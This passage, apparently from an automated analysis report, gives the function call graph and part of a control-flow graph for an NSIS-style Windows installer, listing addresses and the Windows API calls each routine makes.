3900 405727 28 API calls 3899->3900 3902 402167 3900->3902 3901 402157 3901->3902 3903 401423 28 API calls 3901->3903 3902->3895 3904 4021b3 FreeLibrary 3902->3904 3903->3902 3904->3895 3910 4066c4 WideCharToMultiByte 3905->3910 3907 406b22 3908 406b29 GetProcAddress 3907->3908 3909 402151 3907->3909 3908->3909 3909->3899 3909->3901 3910->3907 4330 402b7e 4331 402bd0 4330->4331 4332 402b85 4330->4332 4333 406a96 5 API calls 4331->4333 4335 402da9 21 API calls 4332->4335 4336 402bce 4332->4336 4334 402bd7 4333->4334 4337 402dcb 21 API calls 4334->4337 4338 402b93 4335->4338 4339 402be0 4337->4339 4340 402da9 21 API calls 4338->4340 4339->4336 4341 402be4 IIDFromString 4339->4341 4343 402b9f 4340->4343 4341->4336 4342 402bf3 4341->4342 4342->4336 4348 4066a2 lstrcpynW 4342->4348 4347 4065e9 wsprintfW 4343->4347 4345 402c10 CoTaskMemFree 4345->4336 4347->4336 4348->4345 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 402a80 4361 402da9 21 API calls 4360->4361 4362 402a86 4361->4362 4363 402ac9 4362->4363 4364 402aad 4362->4364 4368 402953 4362->4368 4366 402ae3 4363->4366 4367 402ad3 4363->4367 4365 402ab2 4364->4365 4373 402ac3 4364->4373 4374 4066a2 lstrcpynW 4365->4374 4370 4066df 21 API calls 4366->4370 4369 402da9 21 API calls 4367->4369 4369->4373 4370->4373 4373->4368 4375 4065e9 wsprintfW 4373->4375 4374->4368 4375->4368 3327 401781 3333 402dcb 3327->3333 3331 40178f 3332 4061c1 2 API calls 3331->3332 3332->3331 3334 402dd7 3333->3334 3335 4066df 21 API calls 3334->3335 3336 402df8 3335->3336 3337 401788 3336->3337 3338 406950 5 API calls 3336->3338 3339 4061c1 3337->3339 3338->3337 3340 4061ce GetTickCount GetTempFileNameW 3339->3340 3341 406208 3340->3341 3342 406204 3340->3342 3341->3331 3342->3340 3342->3341 3343 403c82 3344 403c93 CloseHandle 3343->3344 3345 403c9d 3343->3345 3344->3345 3346 403cb1 3345->3346 3347 403ca7 CloseHandle 3345->3347 3352 403cdf 3346->3352 3347->3346 3353 403ced 3352->3353 3354 403cb6 3353->3354 3355 403cf2 FreeLibrary GlobalFree 3353->3355 3356 405dae 3354->3356 3355->3354 3355->3355 3392 406079 3356->3392 3359 405dd6 DeleteFileW 3366 403cc2 3359->3366 3360 405f0d 3360->3366 3435 4069ff FindFirstFileW 3360->3435 3361 405ded 3361->3360 3406 4066a2 lstrcpynW 3361->3406 3363 405e13 3364 405e26 3363->3364 3365 405e19 lstrcatW 3363->3365 3407 405fbd lstrlenW 3364->3407 3367 405e2c 3365->3367 3370 405e3c lstrcatW 3367->3370 3372 405e47 lstrlenW FindFirstFileW 3367->3372 3370->3372 3372->3360 3390 405e69 3372->3390 3375 405ef0 FindNextFileW 3378 405f06 FindClose 3375->3378 3375->3390 3376 405d66 5 API calls 3379 405f48 3376->3379 3378->3360 3380 405f62 3379->3380 3381 405f4c 3379->3381 3383 405727 28 API calls 3380->3383 3381->3366 3384 405727 28 API calls 3381->3384 3383->3366 3386 405f59 3384->3386 3385 405dae 64 API calls 3385->3390 3387 406462 40 API calls 3386->3387 3387->3366 3388 405727 28 API calls 3388->3375 3390->3375 3390->3385 3390->3388 3411 4066a2 lstrcpynW 3390->3411 3412 405d66 3390->3412 3420 405727 3390->3420 3431 406462 MoveFileExW 3390->3431 3441 4066a2 lstrcpynW 3392->3441 3394 40608a 3442 40601c CharNextW CharNextW 3394->3442 3397 405dce 3397->3359 3397->3361 3398 406950 5 API calls 3404 4060a0 3398->3404 3399 4060d1 lstrlenW 3400 4060dc 3399->3400 3399->3404 3401 405f71 3 API calls 3400->3401 3403 4060e1 GetFileAttributesW 3401->3403 3402 4069ff 2 API calls 3402->3404 3403->3397 3404->3397 3404->3399 3404->3402 3405 405fbd 2 API calls 3404->3405 3405->3399 3406->3363 3408 405fcb 3407->3408 3409 405fd1 CharPrevW 3408->3409 3410 405fdd 3408->3410 3409->3408 3409->3410 3410->3367 3411->3390 3448 40616d GetFileAttributesW 3412->3448 3415 405d93 3415->3390 3416 405d81 RemoveDirectoryW 3418 405d8f 3416->3418 3417 405d89 DeleteFileW 3417->3418 3418->3415 3419 405d9f SetFileAttributesW 3418->3419 3419->3415 3421 405742 3420->3421 3430 4057e4 3420->3430 3422 40575e lstrlenW 3421->3422 3423 4066df 21 API calls 3421->3423 3424 405787 3422->3424 3425 40576c lstrlenW 3422->3425 3423->3422 3426 40579a 3424->3426 3427 40578d SetWindowTextW 3424->3427 3428 40577e lstrcatW 3425->3428 3425->3430 3429 4057a0 SendMessageW SendMessageW SendMessageW 3426->3429 3426->3430 3427->3426 3428->3424 3429->3430 3430->3390 3432 406483 3431->3432 3433 406476 3431->3433 3432->3390 3451 4062e8 3433->3451 3436 405f32 3435->3436 3437 406a15 FindClose 3435->3437 3436->3366 3438 405f71 lstrlenW CharPrevW 3436->3438 3437->3436 3439 405f3c 3438->3439 3440 405f8d lstrcatW 3438->3440 3439->3376 3440->3439 3441->3394 3443 406039 3442->3443 3446 40604b 3442->3446 3445 406046 CharNextW 3443->3445 3443->3446 3444 40606f 3444->3397 3444->3398 3445->3444 3446->3444 3447 405f9e CharNextW 3446->3447 3447->3446 3449 405d72 3448->3449 3450 40617f SetFileAttributesW 3448->3450 3449->3415 3449->3416 3449->3417 3450->3449 3452 406318 3451->3452 3453 40633e GetShortPathNameW 3451->3453 3478 406192 GetFileAttributesW CreateFileW 3452->3478 3455 406353 3453->3455 3456 40645d 3453->3456 3455->3456 3457 40635b wsprintfA 3455->3457 3456->3432 3459 4066df 21 API calls 3457->3459 3458 406322 CloseHandle GetShortPathNameW 3458->3456 3460 406336 3458->3460 3461 406383 3459->3461 3460->3453 3460->3456 3479 406192 GetFileAttributesW CreateFileW 3461->3479 3463 406390 3463->3456 3464 40639f GetFileSize GlobalAlloc 3463->3464 3465 4063c1 3464->3465 3466 406456 CloseHandle 3464->3466 3480 406215 ReadFile 3465->3480 3466->3456 3471 4063e0 lstrcpyA 3474 406402 3471->3474 3472 4063f4 3473 4060f7 4 API calls 3472->3473 3473->3474 3475 406439 SetFilePointer 3474->3475 3487 406244 WriteFile 3475->3487 3478->3458 3479->3463 3481 406233 3480->3481 3481->3466 3482 4060f7 lstrlenA 3481->3482 3483 406138 lstrlenA 3482->3483 3484 406140 3483->3484 3485 406111 lstrcmpiA 3483->3485 3484->3471 3484->3472 3485->3484 3486 40612f CharNextA 3485->3486 3486->3483 3488 406262 GlobalFree 3487->3488 3488->3466 4376 401d82 4377 402da9 21 API calls 4376->4377 4378 401d93 SetWindowLongW 4377->4378 4379 402c4f 4378->4379 4380 401503 4381 401508 4380->4381 4382 40152e 4380->4382 4383 402da9 21 API calls 4381->4383 4383->4382 4384 402903 4385 40290b 4384->4385 4386 40290f FindNextFileW 4385->4386 4388 402921 4385->4388 4387 402968 4386->4387 4386->4388 4390 4066a2 lstrcpynW 4387->4390 4390->4388 4391 401588 4392 402bc9 4391->4392 4395 4065e9 wsprintfW 4392->4395 4394 402bce 4395->4394 3881 401389 3883 401390 3881->3883 3882 4013fe 3883->3882 3884 4013cb MulDiv SendMessageW 3883->3884 3884->3883 4403 40198d 4404 402da9 21 API calls 4403->4404 4405 401994 4404->4405 4406 402da9 21 API calls 4405->4406 4407 4019a1 4406->4407 4408 402dcb 21 API calls 4407->4408 4409 4019b8 lstrlenW 4408->4409 4411 4019c9 4409->4411 4410 401a0a 4411->4410 4415 4066a2 lstrcpynW 4411->4415 4413 4019fa 4413->4410 4414 4019ff lstrlenW 4413->4414 4414->4410 4415->4413 4416 40508e GetDlgItem GetDlgItem 4417 4050e0 7 API calls 4416->4417 4428 405305 4416->4428 4418 405187 DeleteObject 4417->4418 4419 40517a SendMessageW 4417->4419 4420 405190 4418->4420 4419->4418 4422 4051c7 4420->4422 4423 4066df 21 API calls 4420->4423 4421 4053e7 4425 405493 4421->4425 4431 405440 SendMessageW 4421->4431 4459 4052f8 4421->4459 4424 404621 22 API calls 4422->4424 4429 4051a9 SendMessageW SendMessageW 4423->4429 4430 4051db 4424->4430 4426 4054a5 4425->4426 4427 40549d SendMessageW 4425->4427 4439 4054b7 ImageList_Destroy 4426->4439 4440 4054be 4426->4440 4444 4054ce 4426->4444 4427->4426 4428->4421 4447 405374 4428->4447 4470 404fdc SendMessageW 4428->4470 4429->4420 4435 404621 22 API calls 4430->4435 4437 405455 SendMessageW 4431->4437 4431->4459 4432 4053d9 SendMessageW 4432->4421 4433 404688 8 API calls 4438 405694 4433->4438 4448 4051ec 4435->4448 4436 405648 4445 40565a ShowWindow GetDlgItem ShowWindow 4436->4445 4436->4459 4442 405468 4437->4442 4439->4440 4443 4054c7 GlobalFree 4440->4443 4440->4444 4441 4052c7 GetWindowLongW SetWindowLongW 4446 4052e0 4441->4446 4453 405479 SendMessageW 4442->4453 4443->4444 4444->4436 4462 405509 4444->4462 4475 40505c 4444->4475 4445->4459 4449 4052e5 ShowWindow 4446->4449 4450 4052fd 4446->4450 4447->4421 4447->4432 4448->4441 4452 40523f SendMessageW 4448->4452 4454 4052c2 4448->4454 4456 405291 SendMessageW 4448->4456 4457 40527d SendMessageW 4448->4457 4468 404656 SendMessageW 4449->4468 4469 404656 SendMessageW 4450->4469 4452->4448 4453->4425 4454->4441 4454->4446 4456->4448 4457->4448 4459->4433 4460 405613 4461 40561e InvalidateRect 4460->4461 4464 40562a 4460->4464 4461->4464 4463 405537 SendMessageW 4462->4463 4467 40554d 4462->4467 4463->4467 4464->4436 4484 404f97 4464->4484 4466 4055c1 SendMessageW SendMessageW 4466->4467 4467->4460 4467->4466 4468->4459 4469->4428 4471 40503b SendMessageW 4470->4471 4472 404fff GetMessagePos ScreenToClient SendMessageW 4470->4472 4473 405033 4471->4473 4472->4473 4474 405038 4472->4474 4473->4447 4474->4471 4487 4066a2 lstrcpynW 4475->4487 4477 40506f 4488 4065e9 wsprintfW 4477->4488 4479 405079 4480 40140b 2 API calls 4479->4480 4481 405082 4480->4481 4489 4066a2 lstrcpynW 4481->4489 4483 405089 4483->4462 4490 404ece 4484->4490 4486 404fac 4486->4436 4487->4477 4488->4479 4489->4483 4491 404ee7 4490->4491 4492 4066df 21 API calls 4491->4492 4493 404f4b 4492->4493 4494 4066df 21 API calls 4493->4494 4495 404f56 4494->4495 4496 4066df 21 API calls 4495->4496 4497 404f6c lstrlenW wsprintfW SetDlgItemTextW 4496->4497 4497->4486 4498 40168f 4499 402dcb 21 API calls 4498->4499 4500 401695 4499->4500 4501 4069ff 2 API calls 4500->4501 4502 40169b 4501->4502 4503 402b10 4504 402da9 21 API calls 4503->4504 4506 402b16 4504->4506 4505 4066df 21 API calls 4507 402953 4505->4507 4506->4505 4506->4507 4508 402711 4509 402da9 21 API calls 4508->4509 4517 402720 4509->4517 4510 40285d 4511 40276a ReadFile 4511->4510 4511->4517 4512 406215 ReadFile 4512->4517 4513 406273 5 API calls 4513->4517 4514 4027aa MultiByteToWideChar 4514->4517 4515 40285f 4521 4065e9 wsprintfW 4515->4521 4517->4510 4517->4511 4517->4512 4517->4513 4517->4514 4517->4515 4518 4027d0 SetFilePointer MultiByteToWideChar 4517->4518 4519 402870 4517->4519 4518->4517 4519->4510 4520 402891 SetFilePointer 4519->4520 4520->4510 4521->4510 4522 404791 lstrlenW 4523 4047b0 4522->4523 4524 4047b2 WideCharToMultiByte 4522->4524 4523->4524 4525 401491 4526 405727 28 API calls 4525->4526 4527 401498 4526->4527 4528 404b12 4529 404b3e 4528->4529 4530 404b4f 4528->4530 4589 405ce6 GetDlgItemTextW 4529->4589 4531 404b5b GetDlgItem 4530->4531 4538 404bba 4530->4538 4533 404b6f 4531->4533 4537 404b83 SetWindowTextW 4533->4537 4541 40601c 4 API calls 4533->4541 4534 404c9e 4587 404e4d 4534->4587 4591 405ce6 GetDlgItemTextW 4534->4591 4535 404b49 4536 406950 5 API calls 4535->4536 4536->4530 4542 404621 22 API calls 4537->4542 4538->4534 4543 4066df 21 API calls 4538->4543 4538->4587 4540 404688 8 API calls 4545 404e61 4540->4545 4546 404b79 4541->4546 4547 404b9f 4542->4547 4548 404c2e SHBrowseForFolderW 4543->4548 4544 404cce 4549 406079 18 API calls 4544->4549 4546->4537 4553 405f71 3 API calls 4546->4553 4550 404621 22 API calls 4547->4550 4548->4534 4551 404c46 CoTaskMemFree 4548->4551 4552 404cd4 4549->4552 4554 404bad 4550->4554 4555 405f71 3 API calls 4551->4555 4592 4066a2 lstrcpynW 4552->4592 4553->4537 4590 404656 SendMessageW 4554->4590 4557 404c53 4555->4557 4560 404c8a SetDlgItemTextW 4557->4560 4564 4066df 21 API calls 4557->4564 4559 404bb3 4563 406a96 5 API calls 4559->4563 4560->4534 4561 404ceb 4562 406a96 5 API calls 4561->4562 4571 404cf2 4562->4571 4563->4538 4565 404c72 lstrcmpiW 4564->4565 4565->4560 4567 404c83 lstrcatW 4565->4567 4566 404d33 4593 4066a2 lstrcpynW 4566->4593 4567->4560 4569 404d3a 4570 40601c 4 API calls 4569->4570 4572 404d40 GetDiskFreeSpaceW 4570->4572 4571->4566 4575 405fbd 2 API calls 4571->4575 4576 404d8b 4571->4576 4574 404d64 MulDiv 4572->4574 4572->4576 4574->4576 4575->4571 4577 404dfc 4576->4577 4579 404f97 24 API calls 4576->4579 4578 404e1f 4577->4578 4580 40140b 2 API calls 4577->4580 4594 404643 EnableWindow 4578->4594 4581 404de9 4579->4581 4580->4578 4582 404dfe SetDlgItemTextW 4581->4582 4583 404dee 4581->4583 4582->4577 4585 404ece 24 API calls 4583->4585 4585->4577 4586 404e3b 4586->4587 4588 404a6b SendMessageW 4586->4588 4587->4540 4588->4587 4589->4535 4590->4559 4591->4544 4592->4561 4593->4569 4594->4586 3489 401794 3490 402dcb 21 API calls 3489->3490 3491 40179b 3490->3491 3492 4017c3 3491->3492 3493 4017bb 3491->3493 3544 4066a2 lstrcpynW 3492->3544 3543 4066a2 lstrcpynW 3493->3543 3496 4017c1 3500 406950 5 API calls 3496->3500 3497 4017ce 3498 405f71 3 API calls 3497->3498 3499 4017d4 lstrcatW 3498->3499 3499->3496 3517 4017e0 3500->3517 3501 4069ff 2 API calls 3501->3517 3502 40616d 2 API calls 3502->3517 3504 4017f2 CompareFileTime 3504->3517 3505 4018b2 3507 405727 28 API calls 3505->3507 3506 401889 3509 405727 28 API calls 3506->3509 3516 40189e 3506->3516 3508 4018bc 3507->3508 3528 403396 3508->3528 3509->3516 3510 4066a2 lstrcpynW 3510->3517 3513 4018e3 SetFileTime 3515 4018f5 CloseHandle 3513->3515 3514 4066df 21 API calls 3514->3517 3515->3516 3518 401906 3515->3518 3517->3501 3517->3502 3517->3504 3517->3505 3517->3506 3517->3510 3517->3514 3523 405d02 MessageBoxIndirectW 3517->3523 3527 406192 GetFileAttributesW CreateFileW 3517->3527 3519 40190b 3518->3519 3520 40191e 3518->3520 3521 4066df 21 API calls 3519->3521 3522 4066df 21 API calls 3520->3522 3524 401913 lstrcatW 3521->3524 3525 401926 3522->3525 3523->3517 3524->3525 3526 405d02 MessageBoxIndirectW 3525->3526 3526->3516 3527->3517 3529 4033c1 3528->3529 3530 4033a5 SetFilePointer 3528->3530 3545 40349e GetTickCount 3529->3545 3530->3529 3533 4018cf 3533->3513 3533->3515 3534 406215 ReadFile 3535 4033e1 3534->3535 3535->3533 3536 40349e 46 API calls 3535->3536 3537 4033f8 3536->3537 3537->3533 3538 403464 ReadFile 3537->3538 3540 403407 3537->3540 3538->3533 3540->3533 3541 406215 ReadFile 3540->3541 3542 406244 WriteFile 3540->3542 3541->3540 3542->3540 3543->3496 3544->3497 3546 4035f6 3545->3546 3547 4034cc 3545->3547 3548 403053 36 API calls 3546->3548 3558 40361d SetFilePointer 3547->3558 3550 4033c8 3548->3550 3550->3533 3550->3534 3551 4034d7 SetFilePointer 3555 4034fc 3551->3555 3555->3550 3556 406244 WriteFile 3555->3556 3557 4035d7 SetFilePointer 3555->3557 3559 403607 3555->3559 3562 406c11 3555->3562 3569 403053 3555->3569 3556->3555 3557->3546 3558->3551 3560 406215 ReadFile 3559->3560 3561 40361a 3560->3561 3561->3555 3563 406c36 3562->3563 3564 406c3e 3562->3564 3563->3555 3564->3563 3565 406cc5 GlobalFree 3564->3565 3566 406cce GlobalAlloc 3564->3566 3567 406d45 GlobalAlloc 3564->3567 3568 406d3c GlobalFree 3564->3568 3565->3566 3566->3563 3566->3564 3567->3563 3567->3564 3568->3567 3570 403064 3569->3570 3571 40307c 3569->3571 3572 403074 3570->3572 3573 40306d DestroyWindow 3570->3573 3574 403084 3571->3574 3575 40308c GetTickCount 3571->3575 3572->3555 3573->3572 3584 406ad2 3574->3584 3575->3572 3577 40309a 3575->3577 3578 4030a2 3577->3578 3579 4030cf CreateDialogParamW ShowWindow 3577->3579 3578->3572 3588 403037 3578->3588 3579->3572 3581 4030b0 wsprintfW 3582 405727 28 API calls 3581->3582 3583 4030cd 3582->3583 3583->3572 3585 406aef PeekMessageW 3584->3585 3586 406ae5 DispatchMessageW 3585->3586 3587 406aff 3585->3587 3586->3585 3587->3572 3589 403046 3588->3589 3590 403048 MulDiv 3588->3590 3589->3590 3590->3581 4595 401a97 4596 402da9 21 API calls 4595->4596 4597 401aa0 4596->4597 4598 402da9 21 API calls 4597->4598 4599 401a45 4598->4599 4600 401598 4601 4015b1 4600->4601 4602 4015a8 ShowWindow 4600->4602 4603 402c4f 4601->4603 4604 4015bf ShowWindow 4601->4604 4602->4601 4604->4603 4605 402419 4606 402dcb 21 API calls 4605->4606 4607 402428 4606->4607 4608 402dcb 21 API calls 4607->4608 4609 402431 4608->4609 4610 402dcb 21 API calls 4609->4610 4611 40243b GetPrivateProfileStringW 4610->4611 4612 40201b 4613 402dcb 21 API calls 4612->4613 4614 402022 4613->4614 4615 4069ff 2 API calls 4614->4615 4616 402028 4615->4616 4618 402039 4616->4618 4619 4065e9 wsprintfW 4616->4619 4619->4618 4620 40569b 4621 4056ab 4620->4621 4622 4056bf 4620->4622 4623 4056b1 4621->4623 4624 405708 4621->4624 4625 4056c7 IsWindowVisible 4622->4625 4631 4056de 4622->4631 4627 40466d SendMessageW 4623->4627 4626 40570d CallWindowProcW 4624->4626 4625->4624 4628 4056d4 4625->4628 4629 4056bb 4626->4629 4627->4629 4630 404fdc 5 API calls 4628->4630 4630->4631 4631->4626 4632 40505c 4 API calls 4631->4632 4632->4624 4633 401b9c 4634 402dcb 21 API calls 4633->4634 4635 401ba3 4634->4635 4636 402da9 21 API calls 4635->4636 4637 401bac wsprintfW 4636->4637 4638 402c4f 4637->4638 4639 40149e 4640 4023c2 4639->4640 4641 4014ac PostQuitMessage 4639->4641 4641->4640 4642 4016a0 4643 402dcb 21 API calls 4642->4643 4644 4016a7 4643->4644 4645 402dcb 21 API calls 4644->4645 4646 4016b0 4645->4646 4647 402dcb 21 API calls 4646->4647 4648 4016b9 MoveFileW 4647->4648 4649 4016cc 4648->4649 4655 4016c5 4648->4655 4651 4069ff 2 API calls 4649->4651 4652 40231b 4649->4652 4650 401423 28 API calls 4650->4652 4653 4016db 4651->4653 4653->4652 4654 406462 40 API calls 4653->4654 4654->4655 4655->4650 4656 404122 4657 40413a 4656->4657 4658 40429b 4656->4658 4657->4658 4659 404146 4657->4659 4660 4042ec 4658->4660 4661 4042ac GetDlgItem GetDlgItem 4658->4661 4663 404151 SetWindowPos 4659->4663 4664 404164 4659->4664 4662 404346 4660->4662 4670 401389 2 API calls 4660->4670 4665 404621 22 API calls 4661->4665 4666 40466d SendMessageW 4662->4666 4682 404296 4662->4682 4663->4664 4667 40416d ShowWindow 4664->4667 4668 4041af 4664->4668 4669 4042d6 SetClassLongW 4665->4669 4717 404358 4666->4717 4671 40418d GetWindowLongW 4667->4671 4694 404259 4667->4694 4672 4041b7 DestroyWindow 4668->4672 4673 4041ce 4668->4673 4674 40140b 2 API calls 4669->4674 4675 40431e 4670->4675 4677 4041a6 ShowWindow 4671->4677 4671->4694 4726 4045aa 4672->4726 4678 4041d3 SetWindowLongW 4673->4678 4679 4041e4 4673->4679 4674->4660 4675->4662 4681 404322 SendMessageW 4675->4681 4676 404688 8 API calls 4676->4682 4677->4668 4678->4682 4680 4041f0 GetDlgItem 4679->4680 4679->4694 4685 404201 SendMessageW IsWindowEnabled 4680->4685 4688 40421e 4680->4688 4681->4682 4683 40140b 2 API calls 4683->4717 4684 4045ac DestroyWindow EndDialog 4684->4726 4685->4682 4685->4688 4686 4045db ShowWindow 4686->4682 4687 4066df 21 API calls 4687->4717 4689 40422b 4688->4689 4691 404272 SendMessageW 4688->4691 4692 40423e 4688->4692 4699 404223 4688->4699 4689->4691 4689->4699 4690 404621 22 API calls 4690->4717 4691->4694 4695 404246 4692->4695 4696 40425b 4692->4696 4693 4045fa SendMessageW 4693->4694 4694->4676 4698 40140b 2 API calls 4695->4698 4697 40140b 2 API calls 4696->4697 4697->4699 4698->4699 4699->4693 4699->4694 4700 404621 22 API calls 4701 4043d3 GetDlgItem 4700->4701 4702 4043f0 ShowWindow EnableWindow 4701->4702 4703 4043e8 4701->4703 4727 404643 EnableWindow 4702->4727 4703->4702 4705 40441a EnableWindow 4710 40442e 4705->4710 4706 404433 GetSystemMenu EnableMenuItem SendMessageW 4707 404463 SendMessageW 4706->4707 4706->4710 4707->4710 4709 404103 22 API calls 4709->4710 4710->4706 4710->4709 4728 404656 SendMessageW 4710->4728 4729 4066a2 lstrcpynW 4710->4729 4712 404492 lstrlenW 4713 4066df 21 API calls 4712->4713 4714 4044a8 SetWindowTextW 4713->4714 4715 401389 2 API calls 4714->4715 4715->4717 4716 4044ec DestroyWindow 4718 404506 CreateDialogParamW 4716->4718 4716->4726 4717->4682 4717->4683 4717->4684 4717->4687 4717->4690 4717->4700 4717->4716 4719 404539 4718->4719 4718->4726 4720 404621 22 API calls 4719->4720 4721 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4720->4721 4722 401389 2 API calls 4721->4722 4723 40458a 4722->4723 4723->4682 4724 404592 ShowWindow 4723->4724 4725 40466d SendMessageW 4724->4725 4725->4726 4726->4682 4726->4686 4727->4705 4728->4710 4729->4712 4730 401a24 4731 402dcb 21 API calls 4730->4731 4732 401a2b 4731->4732 4733 402dcb 21 API calls 4732->4733 4734 401a34 4733->4734 4735 401a3b lstrcmpiW 4734->4735 4736 401a4d lstrcmpW 4734->4736 4737 401a41 4735->4737 4736->4737 4738 402324 4739 402dcb 21 API calls 4738->4739 4740 40232a 4739->4740 4741 402dcb 21 API calls 4740->4741 4742 402333 4741->4742 4743 402dcb 21 API calls 4742->4743 4744 40233c 4743->4744 4745 4069ff 2 API calls 4744->4745 4746 402345 4745->4746 4747 402356 lstrlenW lstrlenW 4746->4747 4751 402349 4746->4751 4749 405727 28 API calls 4747->4749 4748 405727 28 API calls 4752 402351 4748->4752 4750 402394 SHFileOperationW 4749->4750 4750->4751 4750->4752 4751->4748 4751->4752 4760 401da6 4761 401db9 GetDlgItem 4760->4761 4762 401dac 4760->4762 4764 401db3 4761->4764 4763 402da9 21 API calls 4762->4763 4763->4764 4765 401dfa GetClientRect LoadImageW SendMessageW 4764->4765 4766 402dcb 21 API calls 4764->4766 4768 401e58 4765->4768 4770 401e64 4765->4770 4766->4765 4769 401e5d DeleteObject 4768->4769 4768->4770 4769->4770 4771 4023a8 4772 4023c2 4771->4772 4773 4023af 4771->4773 4774 4066df 21 API calls 4773->4774 4775 4023bc 4774->4775 4776 405d02 MessageBoxIndirectW 4775->4776 4776->4772 4777 402c2a SendMessageW 4778 402c44 InvalidateRect 4777->4778 4779 402c4f 4777->4779 4778->4779 4780 4024af 4781 402dcb 21 API calls 4780->4781 4782 4024c1 4781->4782 4783 402dcb 21 API calls 4782->4783 4784 4024cb 4783->4784 4797 402e5b 4784->4797 4787 402953 4788 402503 4790 40250f 4788->4790 4792 402da9 21 API calls 4788->4792 4789 402dcb 21 API calls 4791 4024f9 lstrlenW 4789->4791 4793 40252e RegSetValueExW 4790->4793 4795 403396 48 API calls 4790->4795 4791->4788 4792->4790 4794 402544 RegCloseKey 4793->4794 4794->4787 4795->4793 4798 402e76 4797->4798 4801 40653d 4798->4801 4802 40654c 4801->4802 4803 4024db 4802->4803 4804 406557 RegCreateKeyExW 4802->4804 4803->4787 4803->4788 4803->4789 4804->4803 4805 402930 4806 402dcb 21 API calls 4805->4806 4807 402937 FindFirstFileW 4806->4807 4808 40295f 4807->4808 4812 40294a 4807->4812 4809 402968 4808->4809 4813 4065e9 wsprintfW 4808->4813 4814 4066a2 lstrcpynW 4809->4814 4813->4809 4814->4812 4815 401931 4816 401968 4815->4816 4817 402dcb 21 API calls 4816->4817 4818 40196d 4817->4818 4819 405dae 71 API calls 4818->4819 4820 401976 4819->4820 4821 403d32 4822 403d3d 4821->4822 4823 403d41 4822->4823 4824 403d44 GlobalAlloc 4822->4824 4824->4823 4832 401934 4833 402dcb 21 API calls 4832->4833 4834 40193b 4833->4834 4835 405d02 MessageBoxIndirectW 4834->4835 4836 401944 4835->4836 4837 4028b6 4838 4028bd 4837->4838 4839 402bce 4837->4839 4840 402da9 21 API calls 4838->4840 4841 4028c4 4840->4841 4842 4028d3 SetFilePointer 4841->4842 4842->4839 4843 4028e3 4842->4843 4845 4065e9 wsprintfW 4843->4845 4845->4839 4846 401f37 4847 402dcb 21 API calls 4846->4847 4848 401f3d 4847->4848 4849 402dcb 21 API calls 4848->4849 4850 401f46 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 401f4f 4851->4852 4853 402dcb 21 API calls 4852->4853 4854 401f58 4853->4854 4855 401423 28 API calls 4854->4855 4856 401f5f 4855->4856 4863 405cc8 ShellExecuteExW 4856->4863 4858 401fa7 4859 406b41 5 API calls 4858->4859 4860 402953 4858->4860 4861 401fc4 CloseHandle 4859->4861 4861->4860 4863->4858 4864 402fb8 4865 402fca SetTimer 4864->4865 4867 402fe3 4864->4867 4865->4867 4866 403031 4867->4866 4868 403037 MulDiv 4867->4868 4869 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 4868->4869 4869->4866 4871 4014b8 4872 4014be 4871->4872 4873 401389 2 API calls 4872->4873 4874 4014c6 4873->4874 4875 401d3c 4876 402da9 21 API calls 4875->4876 4877 401d42 IsWindow 4876->4877 4878 401a45 4877->4878

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 25 403794 21->25 25->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 38 403839-40383e 35->38 39 40383f-403843 35->39 36->35 36->36 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->44 45 4039a9-4039c3 DeleteFileW call 4030f5 37->45 38->39 42 403904-403913 call 405f9e 39->42 43 403849-40384f 39->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 ExitProcess CoUninitialize 45->66 67 4039c9-4039cf 45->67 52 40385a-40385d 47->52 53 40385f 47->53 54 4038a4-4038a9 48->54 55 4038bf-4038f9 48->55 52->48 52->53 53->48 54->55 56 4038ab-4038b3 54->56 58 403901-403903 55->58 59 4038fb-4038ff 55->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->55 62->63 63->55 64->45 64->66 65->37 69 403bc2-403bd2 call 405d02 ExitProcess 66->69 70 403be6-403bec 66->70 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 77 403c6a-403c72 70->77 78 403bee-403c04 GetCurrentProcess OpenProcessToken 70->78 88 4039e2-403a17 71->88 89 403a2e-403a38 71->89 86 403a74-403a78 72->86 80 403c74 77->80 81 403c78-403c7c ExitProcess 77->81 84 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403c3a-403c48 call 406a96 78->85 80->81 84->85 97 403c56-403c61 ExitWindowsEx 85->97 98 403c4a-403c54 85->98 86->66 93 403a19-403a1d 88->93 91 403a3a-403a48 call 406079 89->91 92 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 89->92 91->66 107 403a4e-403a64 call 4066a2 * 2 91->107 110 403ab4-403acc 92->110 111 403aa5-403aaf call 4066a2 92->111 95 403a26-403a2a 93->95 96 403a1f-403a24 93->96 95->93 101 403a2c 95->101 96->95 96->101 97->77 102 403c63-403c65 call 40140b 97->102 98->97 98->102 101->89 102->77 107->72 114 403ad1-403ad5 110->114 111->110 116 